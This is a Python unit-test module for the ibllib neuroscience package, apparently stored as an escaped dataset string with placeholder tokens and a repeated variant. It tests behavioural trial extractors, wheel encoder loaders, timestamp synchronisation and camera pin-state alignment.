test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = 
training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = 
biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = 
Path(__file__).parent\n\n    def test_encoder_events_corrupt(self):\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_lt5(file_events)\n            self.assertTrue(dy.size > 6)\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 
3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if 
~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = 
training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 
1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = 
raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            